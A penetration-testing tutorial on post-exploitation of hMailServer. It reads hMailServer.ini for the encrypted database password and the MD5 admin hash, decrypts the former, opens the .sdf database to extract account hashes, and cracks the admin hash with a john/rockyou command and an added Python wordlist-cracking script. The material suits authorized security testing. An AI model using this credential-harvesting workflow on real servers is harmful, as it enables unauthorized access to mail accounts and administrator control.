As part of post exploitation in a security auditing or testing engagement, you will want to gather as much information as you can about the compromised host so you can pick the next target in the chain.
Along the way you sometimes stumble upon strange files, encrypted data, or network traffic that you don't know what to do with. One of these was an .sdf file belonging to hMailServer, an open source mail server for Windows; you can read more about it here.
Once you have access to the server, the first file to read is:
C:\Program Files\hMailServer\Bin\hMailServer.ini
A sample would look something like this:
[Directories]
ProgramFolder=C:\Program Files\hMailServer
DatabaseFolder=C:\Program Files\hMailServer\Database
DataFolder=C:\Program Files\hMailServer\Data
LogFolder=C:\Program Files\hMailServer\Logs
[GUILanguages]
ValidLanguages=english
[Database]
Type=MSSQLCE
Username=
Password=76A2173BE6393254E72FFA4D6DF1030A
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
[Security]
AdministratorPassword=5F4DCC3B5AA765D61D8327DEB882CF99
- Copy the Password value under [Database]; this is the SQL Server database password, and we will come back to it in a bit.
- AdministratorPassword under [Security] is the password hash for hMailAdmin.exe, the application used to manage the mail server.
Note the difference between the two values. The database password has PasswordEncryption=1, meaning it is reversibly encrypted rather than hashed, which is why it can be recovered at all. The administrator password is an unsalted MD5 hash and has to be cracked.
hMailServer is generous enough to ship a tool in its Bin folder that decrypts the database password for you, provided you know the admin password.
See STEP 1 of this article for how to decrypt the SQL password.
Once the SQL server password is in your pocket, you can read the .sdf file (a SQL Server Compact database) and pull out the account hashes. These steps were the easy part for me; I struggled A LOT with opening the .sdf file. Luckily I found a tool called SQL Compact Query Analyzer, which does the job!
Happy hacking
//AK
Legal note: I'm not responsible for how you use these techniques; I presented them assuming you're using them legally.
To crack the admin hash:
john --wordlist=/root/password/rockyou.txt /temp/pass.txt --format=Raw-MD5
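The two steps above that are done by hand in the post (reading the useful fields out of hMailServer.ini, then running the AdministratorPassword MD5 through a wordlist) can be scripted so the triage is repeatable across hosts. The following is an added example written for this page, not code from the post or from the hMailServer project. The ini text and the wordlist are constructed stand-ins modelled on the excerpt above and rockyou.txt; the location of the .sdf file (DatabaseFolder\<Database>.sdf) is an assumption that should be confirmed with a directory listing, since the post only says it is an .sdf file in the install tree.

```python
"""Triage an hMailServer.ini pulled from a compromised host.

Added example for this post, not code from the post or from hMailServer.
"""
import configparser
import hashlib

# Constructed sample modelled on the hMailServer.ini excerpt in the post
# (the [GUILanguages] section is omitted; it carries nothing of interest).
SAMPLE_INI = r"""
[Directories]
ProgramFolder=C:\Program Files\hMailServer
DatabaseFolder=C:\Program Files\hMailServer\Database
DataFolder=C:\Program Files\hMailServer\Data
LogFolder=C:\Program Files\hMailServer\Logs

[Database]
Type=MSSQLCE
Username=
Password=76A2173BE6393254E72FFA4D6DF1030A
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1

[Security]
AdministratorPassword=5F4DCC3B5AA765D61D8327DEB882CF99
"""

# Constructed stand-in for rockyou.txt; a real run would stream the file line by line.
WORDLIST = ["123456", "letmein", "qwerty", "password", "hmail2013"]


def parse_hmailserver_ini(text):
    """Pull out the fields that matter for post-exploitation."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str          # keep key case exactly as written in the file
    cp.read_string(text)
    db = cp["Database"]
    return {
        "db_type": db.get("Type", ""),
        "db_name": db.get("Database", ""),
        "db_folder": cp["Directories"].get("DatabaseFolder", ""),
        "db_user": db.get("Username", ""),
        "db_password": db.get("Password", ""),
        # PasswordEncryption=1 means the value is reversibly encrypted, not hashed;
        # it is what the bundled tool (STEP 1 of the linked article) turns back into plaintext.
        "db_password_encrypted": db.get("PasswordEncryption", "0") == "1",
        "admin_password_md5": cp["Security"].get("AdministratorPassword", "").lower(),
    }


def expected_sdf_path(info):
    """Where the SQL Server Compact file should be for an internal (MSSQLCE) database.

    ASSUMPTION: the file is named <Database>.sdf inside DatabaseFolder; the post only
    says it is an .sdf file, so confirm with a directory listing on the host.
    """
    if info["db_type"] != "MSSQLCE":
        return None   # external MSSQL/MySQL/PostgreSQL: connect over the network instead
    return info["db_folder"].rstrip("\\") + "\\" + info["db_name"] + ".sdf"


def crack_md5(hexdigest, wordlist):
    """Unsalted MD5 wordlist attack; the same thing john --format=Raw-MD5 does for one hash."""
    target = hexdigest.lower()
    for word in wordlist:
        if hashlib.md5(word.encode("utf-8")).hexdigest() == target:
            return word
    return None


def triage(text, wordlist=WORDLIST):
    """Parse the ini, locate the database file and try to crack the admin hash."""
    info = parse_hmailserver_ini(text)
    info["sdf_path"] = expected_sdf_path(info)
    info["admin_password"] = crack_md5(info["admin_password_md5"], wordlist)
    return info


if __name__ == "__main__":
    for key, value in triage(SAMPLE_INI).items():
        print(f"{key:23} {value}")
```

On the sample above, triage() reports the database as internal MSSQLCE with an encrypted password still to be decrypted, and recovers the administrator password from the wordlist (the hash in the excerpt is the MD5 of "password"). The database password is deliberately not attacked with the wordlist: it is encrypted, not hashed, so a hash cracker will never match it and the decryption route described in the post is the right one.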